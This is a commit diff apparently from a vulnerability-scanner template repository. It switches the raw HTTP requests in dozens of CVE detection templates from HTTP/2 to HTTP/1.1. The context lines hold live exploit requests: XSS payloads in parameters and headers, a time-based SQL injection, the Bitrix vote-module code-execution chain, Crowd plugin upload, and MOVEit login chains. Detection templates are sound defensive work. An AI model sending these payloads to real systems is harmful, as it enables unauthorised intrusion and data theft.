Updated HTTP/2 to HTTP/1.1

http/cves/2019/CVE-2019-11580.yaml

@@ -36,7 +36,7 @@ variables:
 http:
   - raw:
       - |
-        POST /crowd/admin/uploadplugin.action HTTP/2
+        POST /crowd/admin/uploadplugin.action HTTP/1.1
         Host: {{Hostname}}
         Accept-Encoding: gzip, deflate
         Content-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7
@@ -49,7 +49,7 @@ http:
         {{plugin}}
         ------------------------------f15fe87e95a7--
       - |
-        GET /crowd/plugins/servlet/exp HTTP/2
+        GET /crowd/plugins/servlet/exp HTTP/1.1
         Host: {{Hostname}}
 
     matchers:

http/cves/2020/CVE-2020-18268.yaml

@@ -39,7 +39,7 @@ http:
 
         btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
       - |
-        GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
+        GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/1.1
         Host: {{Hostname}}
 
     matchers:

http/cves/2021/CVE-2021-24647.yaml

@@ -41,7 +41,7 @@ http:
 
         log={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1
       - |
-        GET /wp-admin/profile.php HTTP/2
+        GET /wp-admin/profile.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2022/CVE-2022-0954.yaml

@@ -46,14 +46,14 @@ http:
 
         username={{username}}&password={{password}}
       - |
-        POST /api/save_option HTTP/2
+        POST /api/save_option HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         Referer: {{BaseURL}}/admin/view:shop/action:options
 
         option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
       - |
-        POST /module/ HTTP/2
+        POST /module/ HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         Referer: {{BaseURL}}/admin/view:shop/action:options

http/cves/2022/CVE-2022-1815.yaml

@@ -37,7 +37,7 @@ info:
 http:
   - raw:
       - |
-        GET /service/0/test.oast.me HTTP/2
+        GET /service/0/test.oast.me HTTP/1.1
         Host: {{Hostname}}
 
     matchers:

http/cves/2022/CVE-2022-24086.yaml

@@ -113,7 +113,7 @@ http:
 
   - raw:
       - |
-        POST /rest/default/V1/guest-carts/{{entity_id}}/shipping-information HTTP/2
+        POST /rest/default/V1/guest-carts/{{entity_id}}/shipping-information HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 
@@ -130,7 +130,7 @@ http:
 
   - raw:
       - |
-        POST /rest/default/V1/guest-carts/{{entity_id}}/payment-information HTTP/2
+        POST /rest/default/V1/guest-carts/{{entity_id}}/payment-information HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 

http/cves/2022/CVE-2022-24181.yaml

@@ -35,7 +35,7 @@ info:
 http:
   - raw:
       - |
-        GET /iupjournals/index.php/esj HTTP/2
+        GET /iupjournals/index.php/esj HTTP/1.1
         Host: {{Hostname}}
         X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com
 

http/cves/2022/CVE-2022-27228.yaml

@@ -36,7 +36,7 @@ flow: http(1) && http(2)
 http:
   - raw:
       - |
-        GET /bitrix/admin/ HTTP/2
+        GET /bitrix/admin/ HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
@@ -55,7 +55,7 @@ http:
 
   - raw:
       - |
-        POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/2
+        POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.1
         Host: {{Hostname}}
         Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxx
 

http/cves/2022/CVE-2022-28290.yaml

@@ -39,7 +39,7 @@ http:
 
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
       - |
-        POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2
+        POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2022/CVE-2022-34267.yaml

@@ -29,7 +29,7 @@ info:
 http:
   - raw:
       - |
-        GET /ws-api/v2/users/me/details?token=02 HTTP/2
+        GET /ws-api/v2/users/me/details?token=02 HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and

http/cves/2022/CVE-2022-47966.yaml

@@ -41,7 +41,7 @@ variables:
 http:
   - raw:
       - |
-        POST /SamlResponseServlet HTTP/2
+        POST /SamlResponseServlet HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2023/CVE-2023-0159.yaml

@@ -33,7 +33,7 @@ info:
 http:
   - raw:
       - |
-        POST /wp-admin/admin-ajax.php HTTP/2
+        POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2023/CVE-2023-0676.yaml

@@ -30,14 +30,14 @@ info:
 http:
   - raw:
       - |
-        POST /app/login/login_check.php HTTP/2
+        POST /app/login/login_check.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         ipamusername={{username}}&ipampassword={{password}}
 
       - |
-        POST /app/tools/ip-calculator/bw-calculator-result.php HTTP/2
+        POST /app/tools/ip-calculator/bw-calculator-result.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         X-Requested-With: XMLHttpRequest

http/cves/2023/CVE-2023-20888.yaml

@@ -41,14 +41,14 @@ info:
 http:
   - raw:
       - |
-        POST /api/auth/login HTTP/2
+        POST /api/auth/login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json;charset=UTF-8
         X-Vrni-Csrf-Token: null
 
         {"username":"{{username}}","password":"{{password}}","domain":"localdomain"}
       - |
-        POST /api/events/push-notifications HTTP/2
+        POST /api/events/push-notifications HTTP/1.1
         Host: {{Hostname}}
         X-Vrni-Csrf-Token: {{csrf}}
         Content-Type: application/json

http/cves/2023/CVE-2023-20889.yaml

@@ -44,14 +44,14 @@ variables:
 http:
   - raw:
       - |
-        POST /api/auth/login HTTP/2
+        POST /api/auth/login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json;charset=UTF-8
         X-Vrni-Csrf-Token: null
 
         {"username":"{{username}}","password":"{{password}}","domain":"localdomain"}
       - |
-        POST /api/pdfexport HTTP/2
+        POST /api/pdfexport HTTP/1.1
         Host: {{Hostname}}
         X-Vrni-Csrf-Token: {{csrf}}
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh

http/cves/2023/CVE-2023-24657.yaml

@@ -35,13 +35,13 @@ info:
 http:
   - raw:
       - |
-        POST /app/login/login_check.php HTTP/2
+        POST /app/login/login_check.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         ipamusername={{username}}&ipampassword={{password}}
       - |
-        GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2
+        GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
         Host: {{Hostname}}
 
     matchers:

http/cves/2023/CVE-2023-2732.yaml

@@ -38,11 +38,11 @@ info:
 http:
   - raw:
       - |
-        GET /wp-json/wp/v2/add-listing?id=1 HTTP/2
+        GET /wp-json/wp/v2/add-listing?id=1 HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
       - |
-        GET /wp-admin/profile.php HTTP/2
+        GET /wp-admin/profile.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2023/CVE-2023-30943.yaml

@@ -41,10 +41,10 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
       - |
-        GET /login/index.php HTTP/2
+        GET /login/index.php HTTP/1.1
         Host: {{Hostname}}
       - |
-        POST /login/index.php HTTP/2
+        POST /login/index.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2023/CVE-2023-32243.yaml

@@ -51,7 +51,7 @@ http:
         GET /author-sitemap.xml HTTP/1.1
         Host: {{Hostname}}
       - |
-        POST /wp-admin/admin-ajax.php HTTP/2
+        POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2023/CVE-2023-34751.yaml

@@ -31,14 +31,14 @@ info:
 http:
   - raw:
       - |
-        POST /admin/index.php HTTP/2
+        POST /admin/index.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         username={{username}}&password={{password}}&action=login
       - |
         @timeout: 10s
-        POST /admin/index.php?mode=user&page=groups&action=edit HTTP/2
+        POST /admin/index.php?mode=user&page=groups&action=edit HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2023/CVE-2023-34752.yaml

@@ -33,14 +33,14 @@ info:
 http:
   - raw:
       - |
-        POST /admin/index.php HTTP/2
+        POST /admin/index.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         username={{username}}&password={{password}}&action=login
       - |
         @timeout: 10s
-        POST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2
+        POST /admin/index.php?mode=settings&page=lang&action=edit HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2023/CVE-2023-34753.yaml

@@ -31,14 +31,14 @@ info:
 http:
   - raw:
       - |
-        POST /admin/index.php HTTP/2
+        POST /admin/index.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         username={{username}}&password={{password}}&action=login
       - |
         @timeout: 10s
-        POST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2
+        POST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2023/CVE-2023-34754.yaml

@@ -31,14 +31,14 @@ info:
 http:
   - raw:
       - |
-        POST /admin/index.php HTTP/2
+        POST /admin/index.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         username={{username}}&password={{password}}&action=login
 
       - |
-        POST /admin/index.php?mode=settings&page=plugins&action=edit HTTP/2
+        POST /admin/index.php?mode=settings&page=plugins&action=edit HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2023/CVE-2023-34756.yaml

@@ -31,14 +31,14 @@ info:
 http:
   - raw:
       - |
-        POST /admin/index.php HTTP/2
+        POST /admin/index.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         username={{username}}&password={{password}}&action=login
       - |
         @timeout: 10s
-        POST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2
+        POST /admin/index.php?mode=settings&page=charset&action=edit HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2023/CVE-2023-35885.yaml

@@ -71,7 +71,7 @@ http:
 
         id=/htdocs/app/files/public/{{str1}}.php&permissions=0777
       - |
-        GET /{{str1}}.php HTTP/2
+        GET /{{str1}}.php HTTP/1.1
         Host: {{Hostname}}
 
     matchers:

http/cves/2023/CVE-2023-36284.yaml

@@ -35,7 +35,7 @@ flow: http(1) && http(2)
 http:
   - raw:
       - |
-        GET / HTTP/2
+        GET / HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
@@ -49,7 +49,7 @@ http:
   - raw:
       - |
         @timeout: 20s
-        GET /quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/2
+        GET /quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/1.1
         Host: {{Hostname}}
 
     matchers:

http/cves/2023/CVE-2023-36287.yaml

@@ -33,7 +33,7 @@ info:
 http:
   - raw:
       - |
-        POST / HTTP/2
+        POST / HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

http/cves/2023/CVE-2023-36934.yaml

@@ -44,14 +44,14 @@ http:
 
         transaction=signon
       - |
-        POST /human.aspx?ep={{url_encode(ep)}} HTTP/2
+        POST /human.aspx?ep={{url_encode(ep)}} HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
         Cookie: InitialPage=zzzz.aspx;
 
         transaction=passchangerequest
       - |
-        POST /machine.aspx HTTP/2
+        POST /machine.aspx HTTP/1.1
         Host: {{Hostname}}
         Cookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};
 

http/cves/2023/CVE-2023-41642.yaml

@@ -27,7 +27,7 @@ info:
 http:
   - raw:
       - |
-        POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/2
+        POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
         User-Agent: </span><script>alert(document.domain)</script>